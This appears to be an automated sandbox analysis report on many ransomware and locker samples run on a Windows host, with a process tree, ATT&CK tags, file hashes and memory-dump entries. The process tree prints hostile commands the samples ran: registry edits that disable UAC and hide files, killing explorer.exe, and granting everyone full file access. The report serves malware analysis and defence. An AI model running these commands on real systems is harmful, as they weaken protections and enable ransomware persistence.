-
C:\Users\Admin\Desktop\Endermanch@Cerber5.exe"C:\Users\Admin\Desktop\Endermanch@Cerber5.exe"1⤵
- Executes dropped EXE
- Enumerates connected drives
-
C:\Users\Admin\Desktop\Endermanch@Birele.exe"C:\Users\Admin\Desktop\Endermanch@Birele.exe"1⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM explorer.exe2⤵
- Kills process with taskkill
-
C:\Users\Admin\Desktop\Endermanch@DeriaLock.exe"C:\Users\Admin\Desktop\Endermanch@DeriaLock.exe"1⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\Endermanch@Petya.A.exe"C:\Users\Admin\Desktop\Endermanch@Petya.A.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\Endermanch@NoMoreRansom.exe"C:\Users\Admin\Desktop\Endermanch@NoMoreRansom.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\Desktop\Endermanch@Krotten.exe"C:\Users\Admin\Desktop\Endermanch@Krotten.exe"1⤵
- Disables RegEdit via registry modification
- Executes dropped EXE
- Adds Run key to start application
- Modifies WinLogon
- Drops file in Windows directory
- Modifies Control Panel
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Users\Admin\Desktop\Endermanch@ViraLock.exe"C:\Users\Admin\Desktop\Endermanch@ViraLock.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\yyosEMIQ\rmAkUQYk.exe"C:\ProgramData\yyosEMIQ\rmAkUQYk.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ioYswEoQ.bat" "C:\Users\Admin\Desktop\Endermanch@ViraLock.exe""2⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs3⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f2⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 22⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 12⤵
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Endermanch@ViraLock"2⤵
-
C:\Users\Admin\Desktop\Fantom.exe"C:\Users\Admin\Desktop\Fantom.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\Endermanch@Xyeta.exe"C:\Users\Admin\Desktop\Endermanch@Xyeta.exe"1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 4482⤵
- Program crash
-
C:\Users\Admin\Desktop\Endermanch@WinlockerVB6Blacksod.exe"C:\Users\Admin\Desktop\Endermanch@WinlockerVB6Blacksod.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\sys3.exeC:\Users\Admin\AppData\Local\Temp\\sys3.exe1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\Endermanch@WannaCrypt0r.exe"C:\Users\Admin\Desktop\Endermanch@WannaCrypt0r.exe"1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- Views/modifies file attributes
-
C:\Users\Admin\Desktop\Endermanch@PowerPoint.exe"C:\Users\Admin\Desktop\Endermanch@PowerPoint.exe"1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
-
C:\Users\Admin\Desktop\Endermanch@PolyRansom.exe"C:\Users\Admin\Desktop\Endermanch@PolyRansom.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vAYggkIA.bat" "C:\Users\Admin\Desktop\Endermanch@PolyRansom.exe""2⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs3⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f2⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 22⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 12⤵
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Endermanch@PolyRansom"2⤵
-
C:\Users\Admin\Desktop\Endermanch@InfinityCrypt.exe"C:\Users\Admin\Desktop\Endermanch@InfinityCrypt.exe"1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Checks processor information in registry
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa38e2055 /state1:0x41c64e6d1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Delete /F /TN rhaegal1⤵
-
C:\Users\Admin\Desktop\Endermanch@PolyRansom.exeC:\Users\Admin\Desktop\Endermanch@PolyRansom1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2324 -ip 23241⤵
-
C:\Users\Admin\Desktop\Endermanch@ViraLock.exeC:\Users\Admin\Desktop\Endermanch@ViraLock1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\system.exeC:\Users\Admin\AppData\Local\system.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:642⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
- Winlogon Helper DLL (2)
- Change Default File Association (1)
- Registry Run Keys / Startup Folder (3)
- Bootkit (1)
- Scheduled Task (1)
- Hidden Files and Directories (1)
Defense Evasion
- Modify Registry (11)
- Bypass User Account Control (1)
- Disabling Security Tools (1)
- File Permissions Modification (1)
- Install Root Certificate (1)
- Hidden Files and Directories (1)
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\agent_launcher.exe
  Filesize: 250KB
  MD5: 00c8768fd6ab655475ec9c9015326587
  SHA1: 410e9743ee86b081a46cf053d915660b51b4aab7
  SHA256: 02312183b0d767fb2a4072d06e655086a64844fe97ed4177ae16ec8d5c76aded
  SHA512: 9aab7aaea306af9fd895fca7b9670c272a88fa207720335863f8036f133e00ea13d4377f7552553cfa34aafc1c03cde68855518db5afda4a43fc7bc1a821a0e2
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\bddeploy.exe
  Filesize: 703KB
  MD5: 6ac1f918386979e9cb90eeb47593be98
  SHA1: 118fa84784338d80dd76f787462f006379e1107a
  SHA256: e9cd0131d7c50116522c1636345ff3eb6e29727e15b6e901ffffc616fa90d595
  SHA512: d5632b20377e6fc32f064f633d0bb1120d0599a074a60aa6f65f77bdc06f8a27013d8e94c7f67313e4f4b88ef4f59f313cade7266c2257e2b16120f88d907a11
- C:\Users\Admin\Downloads\bitdefender_tsecurity.exe
  Filesize: 13.4MB
  MD5: f280ff3f1f817c57385bc802d7cc5017
  SHA1: 4844beeb29856ac964cf925eaf457197b9943fe1
  SHA256: f65766b8157c3b2b24872647585cbf1bcf3e66af5adf360902c16ef7b2e45bd0
  SHA512: 2fd2294c8bb707bb2331bb7e0a8b61766f17fe880f321f209f3c4c5220c66e8628ddc483ba745a9a10361c136a22ca3875856e63c3e70006d2dcdecb117263ad
- \??\pipe\crashpad_1160_AOBRWQEKOUCMATVU
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
- memory/180-224-0x0000000000000000-mapping.dmp
- memory/232-226-0x000000002AA00000-0x000000002AA24000-memory.dmp (Filesize: 144KB)
- memory/436-244-0x0000000000000000-mapping.dmp
- memory/644-256-0x00000000058F0000-0x0000000005946000-memory.dmp (Filesize: 344KB)
- memory/644-230-0x0000000000E90000-0x0000000000ECC000-memory.dmp (Filesize: 240KB)
- memory/644-238-0x0000000005D90000-0x0000000006334000-memory.dmp (Filesize: 5.6MB)
- memory/716-182-0x0000000000000000-mapping.dmp
- memory/720-168-0x0000000000000000-mapping.dmp
- memory/752-173-0x0000000000000000-mapping.dmp
- memory/820-240-0x0000000000400000-0x0000000000432000-memory.dmp (Filesize: 200KB)
- memory/820-260-0x0000000000400000-0x0000000000432000-memory.dmp (Filesize: 200KB)
- memory/1000-217-0x0000000000000000-mapping.dmp
- memory/1020-180-0x000000006EDD0000-0x000000006EDE0000-memory.dmp (Filesize: 64KB)
- memory/1020-179-0x0000000000000000-mapping.dmp
- memory/1112-218-0x0000000000000000-mapping.dmp
- memory/1188-210-0x0000000000000000-mapping.dmp
- memory/1228-160-0x0000000000000000-mapping.dmp
- memory/1240-202-0x0000000000000000-mapping.dmp
- memory/1256-227-0x0000000000000000-mapping.dmp
- memory/1256-265-0x0000000000400000-0x0000000000432000-memory.dmp (Filesize: 200KB)
- memory/1432-251-0x00000000050E0000-0x00000000050EA000-memory.dmp (Filesize: 40KB)
- memory/1656-189-0x0000000000000000-mapping.dmp
- memory/1744-204-0x0000000000000000-mapping.dmp
- memory/1928-245-0x0000000010000000-0x0000000010010000-memory.dmp (Filesize: 64KB)
- memory/2068-225-0x0000000000400000-0x00000000005DE000-memory.dmp (Filesize: 1.9MB)
- memory/2068-233-0x0000000000700000-0x00000000007CE000-memory.dmp (Filesize: 824KB)
- memory/2068-246-0x0000000000400000-0x00000000005DE000-memory.dmp (Filesize: 1.9MB)
- memory/2120-235-0x0000000000000000-mapping.dmp
- memory/2304-253-0x0000000000400000-0x0000000000450000-memory.dmp (Filesize: 320KB)
- memory/2304-250-0x0000000003D50000-0x0000000003D81000-memory.dmp (Filesize: 196KB)
- memory/2304-266-0x0000000000400000-0x0000000000433000-memory.dmp (Filesize: 204KB)
- memory/2324-258-0x0000000000480000-0x0000000000483000-memory.dmp (Filesize: 12KB)
- memory/2324-255-0x0000000000400000-0x000000000044F000-memory.dmp (Filesize: 316KB)
- memory/2380-132-0x00000204A6EA0000-0x00000204A6EE6000-memory.dmp (Filesize: 280KB)
- memory/2380-134-0x00000204C14E0000-0x00000204C14E8000-memory.dmp (Filesize: 32KB)
- memory/2380-135-0x00000204C7E50000-0x00000204C7E88000-memory.dmp (Filesize: 224KB)
- memory/2380-133-0x00007FFE996B0000-0x00007FFE9A171000-memory.dmp (Filesize: 10.8MB)
- memory/2380-136-0x00000204C1510000-0x00000204C151E000-memory.dmp (Filesize: 56KB)
- memory/2380-140-0x00007FFE996B0000-0x00007FFE9A171000-memory.dmp (Filesize: 10.8MB)
- memory/2380-141-0x00007FFE996B0000-0x00007FFE9A171000-memory.dmp (Filesize: 10.8MB)
- memory/2400-138-0x0000000000000000-mapping.dmp
- memory/2424-169-0x0000000000000000-mapping.dmp
- memory/2480-194-0x0000000000000000-mapping.dmp
- memory/2480-176-0x0000000000000000-mapping.dmp
- memory/2480-177-0x000000006EDD0000-0x000000006EDE0000-memory.dmp (Filesize: 64KB)
- memory/2516-167-0x000000006EDD0000-0x000000006EDE0000-memory.dmp (Filesize: 64KB)
- memory/2516-166-0x0000000000000000-mapping.dmp
- memory/2580-213-0x0000000000000000-mapping.dmp
- memory/2608-248-0x0000000000000000-mapping.dmp
- memory/2672-214-0x0000000000000000-mapping.dmp
- memory/2684-219-0x0000000000000000-mapping.dmp
- memory/2716-200-0x0000000000000000-mapping.dmp
- memory/2752-157-0x0000000000000000-mapping.dmp
- memory/2868-228-0x0000000000400000-0x0000000000438000-memory.dmp (Filesize: 224KB)
- memory/2868-231-0x0000000000540000-0x0000000000546000-memory.dmp (Filesize: 24KB)
- memory/2868-262-0x0000000000400000-0x0000000000438000-memory.dmp (Filesize: 224KB)
- memory/2868-222-0x0000000000400000-0x0000000000438000-memory.dmp (Filesize: 224KB)
- memory/3040-209-0x0000000000000000-mapping.dmp
- memory/3040-163-0x0000000000000000-mapping.dmp
- memory/3124-197-0x0000000000000000-mapping.dmp
- memory/3208-205-0x0000000000000000-mapping.dmp
- memory/3332-243-0x0000000000000000-mapping.dmp
- memory/3396-208-0x0000000000000000-mapping.dmp
- memory/3488-150-0x0000000000000000-mapping.dmp
- memory/3496-241-0x0000000004EB0000-0x0000000004F42000-memory.dmp (Filesize: 584KB)
- memory/3496-229-0x0000000000490000-0x0000000000512000-memory.dmp (Filesize: 520KB)
- memory/3496-232-0x0000000004D50000-0x0000000004DEC000-memory.dmp (Filesize: 624KB)
- memory/3504-187-0x0000000000000000-mapping.dmp
- memory/3504-188-0x00007FFEB7B10000-0x00007FFEB7BCE000-memory.dmp (Filesize: 760KB)
- memory/3608-236-0x0000000000000000-mapping.dmp
- memory/3708-195-0x0000000000000000-mapping.dmp
- memory/3712-212-0x0000000000000000-mapping.dmp
- memory/3728-237-0x0000000000400000-0x0000000000439000-memory.dmp (Filesize: 228KB)
- memory/3728-259-0x0000000000400000-0x0000000000439000-memory.dmp (Filesize: 228KB)
- memory/3728-154-0x0000000000000000-mapping.dmp
- memory/3752-247-0x0000000000000000-mapping.dmp
- memory/3776-268-0x0000000000400000-0x0000000000433000-memory.dmp (Filesize: 204KB)
- memory/3776-234-0x0000000000000000-mapping.dmp
- memory/3892-211-0x0000000000000000-mapping.dmp
- memory/3972-196-0x0000000000000000-mapping.dmp
- memory/4016-146-0x0000000000000000-mapping.dmp
- memory/4168-152-0x0000000000000000-mapping.dmp
- memory/4252-201-0x0000000000000000-mapping.dmp
- memory/4268-190-0x0000000000000000-mapping.dmp
- memory/4268-191-0x000000006EDD0000-0x000000006EDE0000-memory.dmp (Filesize: 64KB)
- memory/4360-199-0x0000000000000000-mapping.dmp
- memory/4420-143-0x0000000000000000-mapping.dmp
- memory/4476-239-0x0000000000000000-mapping.dmp
- memory/4484-185-0x0000000000000000-mapping.dmp
- memory/4484-172-0x0000000000000000-mapping.dmp
- memory/4484-206-0x00007FFEB7B10000-0x00007FFEB7BCE000-memory.dmp (Filesize: 760KB)
- memory/4484-186-0x00007FFEB7B10000-0x00007FFEB7BCE000-memory.dmp (Filesize: 760KB)
- memory/4548-203-0x0000000000000000-mapping.dmp
- memory/4548-193-0x0000000000000000-mapping.dmp
- memory/4620-220-0x0000000000000000-mapping.dmp
- memory/4648-156-0x0000000000000000-mapping.dmp
- memory/4660-215-0x0000000000000000-mapping.dmp
- memory/4712-181-0x0000000000000000-mapping.dmp
- memory/4784-198-0x0000000000000000-mapping.dmp
- memory/4792-207-0x0000000000000000-mapping.dmp
- memory/4904-221-0x0000000000000000-mapping.dmp
- memory/4908-216-0x0000000000000000-mapping.dmp
- memory/4952-153-0x0000000000000000-mapping.dmp
- memory/4984-139-0x0000000000000000-mapping.dmp
- memory/5100-257-0x0000000003630000-0x0000000003698000-memory.dmp (Filesize: 416KB)
- memory/5100-242-0x0000000000000000-mapping.dmp
- memory/5100-270-0x0000000003630000-0x0000000003698000-memory.dmp (Filesize: 416KB)
- memory/5500-271-0x0000000000400000-0x0000000000439000-memory.dmp (Filesize: 228KB)
- memory/5560-272-0x0000000000400000-0x0000000000432000-memory.dmp (Filesize: 200KB)